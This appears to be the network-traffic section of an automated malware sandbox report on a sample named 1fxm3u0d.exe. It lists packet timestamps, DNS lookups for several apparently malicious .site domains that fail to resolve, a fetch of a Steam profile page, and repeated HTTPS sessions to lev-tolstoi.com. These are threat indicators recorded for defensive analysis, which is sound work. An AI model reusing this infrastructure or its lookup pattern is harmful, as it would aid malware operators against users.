                                                                                                                                                                                                                                      Dec 18, 2024 11:33:04.635763884 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:04.636140108 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:04.645102024 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:04.645131111 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:04.645195961 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:08.830276966 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:08.830369949 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:08.830522060 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:08.854331970 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:08.854382038 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:09.187544107 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:09.187608004 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:09.187715054 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:09.188023090 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:09.188043118 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:10.402056932 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:10.402196884 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:10.403907061 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:10.403917074 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:10.404279947 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:10.412662029 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:10.412691116 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:10.412789106 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438297033 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438333035 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438349009 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438364983 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438380957 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438421011 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438496113 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438536882 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.438560963 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.446758986 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.446856976 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.446906090 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.446943045 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.464488029 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.464549065 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.464576960 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.518999100 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.557914972 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.612724066 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.612763882 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.628245115 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.628387928 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.628407955 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.632116079 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.632194042 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.632201910 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.632261038 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.632455111 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.632473946 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.632503986 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.632512093 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.761496067 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.761559963 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.761647940 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.762018919 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:11.762034893 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:12.986351013 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:12.986475945 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:12.987751007 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:12.987770081 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:12.988131046 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:12.989392042 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:12.989548922 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:12.989603043 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.259686947 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.259809971 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.260163069 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.263832092 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.263869047 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.662385941 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.662450075 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.663238049 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.663764954 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:15.663794994 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.870066881 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.870174885 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.871932983 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.871962070 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.872208118 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.873940945 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.874247074 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.874284983 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.874366999 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:16.874381065 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.117319107 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.117461920 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.117567062 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.117861032 CET49718443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.117907047 CET44349718104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.302812099 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.302860022 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.302937031 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.303229094 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:18.303242922 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.508866072 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.509208918 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.510552883 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.510564089 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.510822058 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.511944056 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.512078047 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.512126923 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.512198925 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:19.512208939 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.401822090 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.401922941 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.402107000 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.402204990 CET49724443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.402224064 CET44349724104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.766022921 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.766078949 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.766222000 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.766705990 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:20.766722918 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:21.982785940 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:21.982899904 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:21.984411955 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:21.984422922 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:21.984664917 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:21.986027956 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:21.986134052 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:21.986140966 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:22.733808041 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:22.733915091 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:22.734150887 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:22.734358072 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:22.734376907 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:23.188983917 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:23.189032078 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:23.189105034 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:23.189443111 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:23.189457893 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.402242899 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.402350903 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.403485060 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.403513908 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.403769016 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.404982090 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.405747890 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.405797005 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.405945063 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.405992985 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406133890 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406184912 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406378984 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406426907 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406661034 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406712055 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406927109 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406970024 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.406996012 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.407025099 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.407175064 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.407222033 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.407255888 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.407294035 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.407408953 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.447374105 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.447626114 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.447746038 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.447798967 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.447841883 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.447923899 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:24.447962999 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.333754063 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.333837986 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.334176064 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.334220886 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.378937960 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.378981113 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.379074097 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.379456043 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:29.379467964 CET44349758104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:30.409861088 CET49758443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.450788975 CET5669553192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.674860001 CET53566951.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.679311037 CET5581153192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.897387028 CET53558111.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.902357101 CET5416253192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.121304035 CET53541621.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.131331921 CET5153853192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.348119020 CET53515381.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.349775076 CET5954853192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.574557066 CET53595481.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.578042984 CET6422753192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.807142019 CET53642271.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.810076952 CET6537353192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.034061909 CET53653731.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.036958933 CET4954653192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.351340055 CET53495461.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.354665995 CET5512053192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.573503971 CET53551201.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.586338043 CET6319053192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.725975037 CET53631901.1.1.1192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.246649981 CET6368253192.168.2.51.1.1.1
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.384676933 CET53636821.1.1.1192.168.2.5
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.450788975 CET192.168.2.51.1.1.10x9e22Standard query (0)thighpecr.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.679311037 CET192.168.2.51.1.1.10x105aStandard query (0)seallysl.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.902357101 CET192.168.2.51.1.1.10x1ee6Standard query (0)opposezmny.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.131331921 CET192.168.2.51.1.1.10xc228Standard query (0)goalyfeastz.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.349775076 CET192.168.2.51.1.1.10xe1bfStandard query (0)contemteny.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.578042984 CET192.168.2.51.1.1.10xdc76Standard query (0)dilemmadu.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.810076952 CET192.168.2.51.1.1.10xf4a2Standard query (0)faulteyotk.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.036958933 CET192.168.2.51.1.1.10xe305Standard query (0)authorisev.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.354665995 CET192.168.2.51.1.1.10xb0faStandard query (0)servicedny.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.586338043 CET192.168.2.51.1.1.10x2114Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.246649981 CET192.168.2.51.1.1.10xefe5Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.674860001 CET1.1.1.1192.168.2.50x9e22Name error (3)thighpecr.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:58.897387028 CET1.1.1.1192.168.2.50x105aName error (3)seallysl.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.121304035 CET1.1.1.1192.168.2.50x1ee6Name error (3)opposezmny.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.348119020 CET1.1.1.1192.168.2.50xc228Name error (3)goalyfeastz.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.574557066 CET1.1.1.1192.168.2.50xe1bfName error (3)contemteny.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:32:59.807142019 CET1.1.1.1192.168.2.50xdc76Name error (3)dilemmadu.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.034061909 CET1.1.1.1192.168.2.50xf4a2Name error (3)faulteyotk.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.351340055 CET1.1.1.1192.168.2.50xe305Name error (3)authorisev.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.573503971 CET1.1.1.1192.168.2.50xb0faName error (3)servicedny.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.725975037 CET1.1.1.1192.168.2.50x2114No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.384676933 CET1.1.1.1192.168.2.50xefe5No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.384676933 CET1.1.1.1192.168.2.50xefe5No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                      • lev-tolstoi.com
                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.54970523.55.153.1064436596C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 10:33:02 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2024-12-18 10:33:02 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 10:33:02 GMT
                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=0e8e5a237ebc8136366e9246; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2024-12-18 10:33:02 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
